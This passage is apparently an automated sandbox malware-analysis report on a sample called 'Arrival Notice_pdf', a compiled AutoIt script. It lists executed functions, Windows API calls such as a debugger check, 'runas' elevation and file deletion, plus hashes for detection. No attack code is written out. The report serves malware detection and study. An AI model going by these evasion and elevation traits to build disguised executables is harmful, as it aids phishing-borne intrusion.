Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9%
Total number of Nodes:	2000
Total number of Limit Nodes:	56

Executed Functions

Function 0026B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b342fe743d46170cf37ea6124a751452e644d1d58f893d09ad2eb3c639909f22
Instruction ID: d90d99445fb1acd1a2a2560cc64d39d4c7b02c062cccc3edd8c451f8f0d41f99
Opcode Fuzzy Hash: b342fe743d46170cf37ea6124a751452e644d1d58f893d09ad2eb3c639909f22
Instruction Fuzzy Hash: 5F326D75B222298FCB268F14DC95AE9B7B5FB46310F1840D9E40AE7A91D7309ED0CF52

Function 00243D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00243AA3,?), ref: 00243D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00243AA3,?), ref: 00243D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00301148,00301130,?,?,?,?,00243AA3,?), ref: 00243DC8

Part of subcall function 00246430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00243DEE,00301148,?,?,?,?,?,00243AA3,?), ref: 00246471

SetCurrentDirectoryW.KERNEL32(?,?,?,00243AA3,?), ref: 00243E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002F28F4,00000010), ref: 002B1CCE
SetCurrentDirectoryW.KERNEL32(?,00301148,?,?,?,?,?,00243AA3,?), ref: 002B1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002DDAB4,00301148,?,?,?,?,?,00243AA3,?), ref: 002B1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00243AA3), ref: 002B1D90

Part of subcall function 00243E6E: GetSysColorBrush.USER32(0000000F), ref: 00243E79
Part of subcall function 00243E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00243E88
Part of subcall function 00243E6E: LoadIconW.USER32(00000063), ref: 00243E9E
Part of subcall function 00243E6E: LoadIconW.USER32(000000A4), ref: 00243EB0
Part of subcall function 00243E6E: LoadIconW.USER32(000000A2), ref: 00243EC2
Part of subcall function 00243E6E: RegisterClassExW.USER32(?), ref: 00243F30

Part of subcall function 002436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002436E6
Part of subcall function 002436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243707
Part of subcall function 002436B8: ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 0024371B
Part of subcall function 002436B8: ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 00243724

Part of subcall function 00244FFC: _memset.LIBCMT ref: 00245022
Part of subcall function 00244FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002450CB

Strings

()/, xrefs: 002B1D49
runas, xrefs: 002B1D84
This is a third-party compiled AutoIt script., xrefs: 002B1CC8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()/$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-2193626289
Opcode ID: bc0be4af191cda6e6ae493eb72483f6aa32b5c9e9f8197abc66ff0393f7e7c25
Instruction ID: 81a1df8317b7d6eefd775e04170dc8f277d0461232b0291faeaf7ee4f8934477
Opcode Fuzzy Hash: bc0be4af191cda6e6ae493eb72483f6aa32b5c9e9f8197abc66ff0393f7e7c25
Instruction Fuzzy Hash: 39512B30A26249ABCF1EEFB0DC65EEE7B799F19744F004066F64163192DAB04679CF21

Function 0025DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0025DDEC
GetCurrentProcess.KERNEL32(00000000,002DDC38,?,?), ref: 0025DEAC
GetNativeSystemInfo.KERNELBASE(?,002DDC38,?,?), ref: 0025DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0025DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0025DF1F
GetSystemInfo.KERNEL32(?,002DDC38,?,?), ref: 0025DF29
GetSystemInfo.KERNEL32(?,002DDC38,?,?), ref: 0025DF35

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 73a081b3200e47268f404a3e3c1f983e2e83030a6fdec8dfb14f12da53834315
Instruction ID: 18881a516eb3af148fc95dfe16df262a33c1bf824b664924da1925a542b52236
Opcode Fuzzy Hash: 73a081b3200e47268f404a3e3c1f983e2e83030a6fdec8dfb14f12da53834315
Instruction Fuzzy Hash: C961B0B182A384CBCF25CF6898C15E97FB4AF29301B1949D9DC459F207C674C91DCB69

Function 0024406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0024449E,?,?,00000000,00000001), ref: 0024407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0024449E,?,?,00000000,00000001), ref: 00244092
LoadResource.KERNEL32(?,00000000,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB), ref: 002B4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB), ref: 002B4F2F
LockResource.KERNEL32(0024449E,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB,00000000), ref: 002B4F42

Strings

SCRIPT, xrefs: 00244088

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 06933d3a0c82f6da4523c5e784c5980a52c5977e6ef2c0227a27daf05253fbf1
Instruction ID: 0dfe5d2ee798b9b1b0215f3b519302ca59c49971415655da6bf9f3cf7e878225
Opcode Fuzzy Hash: 06933d3a0c82f6da4523c5e784c5980a52c5977e6ef2c0227a27daf05253fbf1
Instruction Fuzzy Hash: 87117C70210701BFE7299B66EC48F27BBB9EBC5B61F10412DF602962A0DB71DC10CA21

Function 00253B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

0, xrefs: 002540A4
0, xrefs: 002540EC
0, xrefs: 002B701F
@, xrefs: 00254176

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ 0$ 0$ 0
API String ID: 3728558374-1819487181
Opcode ID: 33fd7931853ab9fa75720e4d5ddfe37abd18dc7804d40d03ec2512d891a30c1a
Instruction ID: 83cf89dc3fc33617fd58e3fbdb71bfc697ed25d78a24550ac2d6c660a8180cae
Opcode Fuzzy Hash: 33fd7931853ab9fa75720e4d5ddfe37abd18dc7804d40d03ec2512d891a30c1a
Instruction Fuzzy Hash: 1072CF34E242099FCF14EF94C481ABEB7B5EF48341F14805AED09AB291D770AE69CF95

Function 00286CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,002B2F49), ref: 00286CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00286CCA
FindClose.KERNEL32(00000000), ref: 00286CDA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 09d7db2ae7cbef50c3bf16c9653947ad3e477010accfb89e4d9e8c88fc89543d
Instruction ID: 369527e359bbc27ea86ac147eac2228ef2848b548dd25cd4ca877e0fdd7e1017
Opcode Fuzzy Hash: 09d7db2ae7cbef50c3bf16c9653947ad3e477010accfb89e4d9e8c88fc89543d
Instruction Fuzzy Hash: 17E0D8358214115B83107778FC0D8E9376CDA05339F100716F475C11D0E7F0D91046D5

Function 00253200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

0, xrefs: 002B933E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharUpper
String ID: 0
API String ID: 3964851224-1466728594
Opcode ID: 71c9a564becb16c161719f40e9b26f43b0c800c484ad6c1c1693e5fbfc0829ce
Instruction ID: b9232cf01201c06f356ffde45fece71864937b3ec802cc92462703270182926d
Opcode Fuzzy Hash: 71c9a564becb16c161719f40e9b26f43b0c800c484ad6c1c1693e5fbfc0829ce
Instruction Fuzzy Hash: 4C92AC70628301DFD724DF18C484B6AB7E1BF88344F14885DE98A8B392D771EDA9CB56

Function 0024E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024E959
timeGetTime.WINMM ref: 0024EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024ED2E
TranslateMessage.USER32(?), ref: 0024ED3F
DispatchMessageW.USER32(?), ref: 0024ED4A
LockWindowUpdate.USER32(00000000), ref: 0024ED79
DestroyWindow.USER32 ref: 0024ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024ED9F
Sleep.KERNEL32(0000000A), ref: 002B5270
TranslateMessage.USER32(?), ref: 002B59F7
DispatchMessageW.USER32(?), ref: 002B5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002B5A19

Strings

@TRAY_ID, xrefs: 002B54C9
@GUI_CTRLID, xrefs: 002B5314
@GUI_WINHANDLE, xrefs: 002B5360
@GUI_CTRLHANDLE, xrefs: 002B53AC

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: cb3f1d76f551809ac2157233f3d3c924232def762c5332d347731542d72a366a
Instruction ID: 1bb4f84258237efa0ade30adcfb18ba3833f4e178abd3ef9bde9fe511eb19309
Opcode Fuzzy Hash: cb3f1d76f551809ac2157233f3d3c924232def762c5332d347731542d72a366a
Instruction Fuzzy Hash: 7262E270524341DFEB29DF24C885BAA77E4BF44304F15496EF98A8B292DBB0D858CF52

Function 00275C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00275EC3
___createFile.LIBCMT ref: 00275F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00275F2D
__dosmaperr.LIBCMT ref: 00275F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00275F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00275F6A
__dosmaperr.LIBCMT ref: 00275F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00275F7C
__set_osfhnd.LIBCMT ref: 00275FAC
__lseeki64_nolock.LIBCMT ref: 00276016
__close_nolock.LIBCMT ref: 0027603C
__chsize_nolock.LIBCMT ref: 0027606C
__lseeki64_nolock.LIBCMT ref: 0027607E
__lseeki64_nolock.LIBCMT ref: 00276176
__lseeki64_nolock.LIBCMT ref: 0027618B
__close_nolock.LIBCMT ref: 002761EB

Part of subcall function 0026EA9C: CloseHandle.KERNELBASE(00000000,002EEEF4,00000000,?,00276041,002EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0026EAEC
Part of subcall function 0026EA9C: GetLastError.KERNEL32(?,00276041,002EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0026EAF6
Part of subcall function 0026EA9C: __free_osfhnd.LIBCMT ref: 0026EB03
Part of subcall function 0026EA9C: __dosmaperr.LIBCMT ref: 0026EB25

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__lseeki64_nolock.LIBCMT ref: 0027620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00276342
___createFile.LIBCMT ref: 00276361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0027636E
__dosmaperr.LIBCMT ref: 00276375
__free_osfhnd.LIBCMT ref: 00276395
__invoke_watson.LIBCMT ref: 002763C3
__wsopen_helper.LIBCMT ref: 002763DD

Strings

@, xrefs: 00275F98

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 9b99bb437043dfb491c509c7ed7f03c44d791bd5a48c1ec24876d7aceccb711d
Instruction ID: 97038ae051aa307eb262524acee45f867080d93a36cb9161280ba9ae650f15db
Opcode Fuzzy Hash: 9b99bb437043dfb491c509c7ed7f03c44d791bd5a48c1ec24876d7aceccb711d
Instruction Fuzzy Hash: 5E225971920A179FEF259F68DC49BBDBB61EB00314F24C229E919972D2C3B58D70CB91

Function 0028FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0028FA96
_wcschr.LIBCMT ref: 0028FAA4
_wcscpy.LIBCMT ref: 0028FABB
_wcscat.LIBCMT ref: 0028FACA
_wcscat.LIBCMT ref: 0028FAE8
_wcscpy.LIBCMT ref: 0028FB09
__wsplitpath.LIBCMT ref: 0028FBE6
_wcscpy.LIBCMT ref: 0028FC0B
_wcscpy.LIBCMT ref: 0028FC1D
_wcscpy.LIBCMT ref: 0028FC32
_wcscat.LIBCMT ref: 0028FC47
_wcscat.LIBCMT ref: 0028FC59
_wcscat.LIBCMT ref: 0028FC6E

Part of subcall function 0028BFA4: _wcscmp.LIBCMT ref: 0028C03E
Part of subcall function 0028BFA4: __wsplitpath.LIBCMT ref: 0028C083
Part of subcall function 0028BFA4: _wcscpy.LIBCMT ref: 0028C096
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0A9
Part of subcall function 0028BFA4: __wsplitpath.LIBCMT ref: 0028C0CE
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0E4
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0028FA61
t2/, xrefs: 0028FC97

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2/
API String ID: 2955681530-666463152
Opcode ID: 25c2bc6a0885ce71202865173a07f10289efbdffa2cb1821cd9f1c9a784fbf05
Instruction ID: d6ba49de401171184a455be0b3cee5694366665862f511d1f2c30e2de03b1cd2
Opcode Fuzzy Hash: 25c2bc6a0885ce71202865173a07f10289efbdffa2cb1821cd9f1c9a784fbf05
Instruction Fuzzy Hash: 8291B2755243059FCB24FF50C991E9BB3E8BF88710F004969F98997291DB30EAA4CF92

Function 00243F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00243F86
RegisterClassExW.USER32(00000030), ref: 00243FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00243FC1
InitCommonControlsEx.COMCTL32(?), ref: 00243FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00243FEE
LoadIconW.USER32(000000A9), ref: 00244004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00244013

Strings

0, xrefs: 00243F68
AutoIt v3 GUI, xrefs: 00243FA2
TaskbarCreated, xrefs: 00243FB6
+, xrefs: 00243F6F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 57fb9def2839417492ed0f96df0a97c7276679d25e01ad0c367a5520be2cde31
Instruction ID: d71f9173811a117dc54957f8c7b2f3c979dddadd3eda5de06fc0aa1baa32d4e2
Opcode Fuzzy Hash: 57fb9def2839417492ed0f96df0a97c7276679d25e01ad0c367a5520be2cde31
Instruction Fuzzy Hash: 5221D6B5D11318AFDB01DFA4EC99BCEBBB8FB08704F00422AFA15A62A0D7B54544CF95

Function 0028BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0028BDB4: __time64.LIBCMT ref: 0028BDBE

Part of subcall function 00244517: _fseek.LIBCMT ref: 0024452F

__wsplitpath.LIBCMT ref: 0028C083

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscpy.LIBCMT ref: 0028C096
_wcscat.LIBCMT ref: 0028C0A9
__wsplitpath.LIBCMT ref: 0028C0CE
_wcscat.LIBCMT ref: 0028C0E4
_wcscat.LIBCMT ref: 0028C0F7
_wcscmp.LIBCMT ref: 0028C03E

Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C65D
Part of subcall function 0028C56D: _wcscmp.LIBCMT ref: 0028C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0028C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0028C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0028C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0028C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0028C371

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: d3e635853cfab5160b4db85c18a041aa695c0c2d03a3f408d43ee1d534bd40c0
Instruction ID: e7063ff1a2684a56f01e3845c88b3b13b4f8fbd0be27dab55061700a3d9a5af4
Opcode Fuzzy Hash: d3e635853cfab5160b4db85c18a041aa695c0c2d03a3f408d43ee1d534bd40c0
Instruction Fuzzy Hash: 62C14AB5911219AFDF11EF94CC81EDEB7BCAF49310F1080AAF609E6191DB709A948F61

Function 00243742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002437B3
KillTimer.USER32(?,00000001), ref: 002437DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00243800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0024380B
CreatePopupMenu.USER32 ref: 0024381F
PostQuitMessage.USER32(00000000), ref: 0024382E

Strings

TaskbarCreated, xrefs: 00243806

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 00f924f0a7a471b1e6b3ab2c7bd77511eb90b1c27f4fd9a440999a02ec8bbdfb
Instruction ID: bad8d0763e5a96938264671c0c75b8630bbe1ab40f2d97e9627fb0450f710fe1
Opcode Fuzzy Hash: 00f924f0a7a471b1e6b3ab2c7bd77511eb90b1c27f4fd9a440999a02ec8bbdfb
Instruction Fuzzy Hash: CB4127F5131147A7DB1EEF28AC5EFBA7699F704340F500126FA82D21D1CAA0DE709762

Function 00243E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

